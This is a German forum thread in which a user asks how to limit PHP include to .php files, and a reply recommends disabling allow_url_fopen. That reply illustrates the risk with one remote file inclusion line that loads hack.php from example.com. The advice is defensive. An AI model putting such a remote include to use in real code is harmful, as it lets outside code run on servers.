wo ich das eben mit include lese, ich hab mich gefragt wie ich den include oder require von php auf bestimmte Dateiendungen beschränken kann ?
Bei meinen Skripten bin ich mir ja im klaren was passiert, doch bei meinen Kunden ist das was anderes.
Ich möchte, dass der Kunde nur .php Dateien includen kann! Gibt es da eine Konfigurationsmöglichkeit über open_basedir :?:
THX
MC
php include beschränken
Re: php include beschränken
Gegenfrage:
Warum willst du das?
Und nein, mir ist keine solche Einstellung bekannt.
Warum willst du das?
Und nein, mir ist keine solche Einstellung bekannt.
Re: php include beschränken
Hallo,
was die Beschränkung auf .php bringen soll versteh ich nicht.
Du kannst allow_url_fopen=Off setzen, dann ist es nicht mehr möglich Dateien von anderen Servern zu includen.
geht dann nicht mehr. Damit ist include deutlich entschärft, allerdings sind dann auch alle anderen Dateioperationen nicht mehr über URL möglich sondern müssen komplizierter programmiert werden.
Fürchte nur deine Kunden würden dir auf's Dach steigen, weil sie an dieses bequeme Sicherheitsrisiko gewohnt sind.
Gruß, Wolfgang
was die Beschränkung auf .php bringen soll versteh ich nicht.
Du kannst allow_url_fopen=Off setzen, dann ist es nicht mehr möglich Dateien von anderen Servern zu includen.
Code: Select all
include('http://example.com/hack.php);
Fürchte nur deine Kunden würden dir auf's Dach steigen, weil sie an dieses bequeme Sicherheitsrisiko gewohnt sind.
Gruß, Wolfgang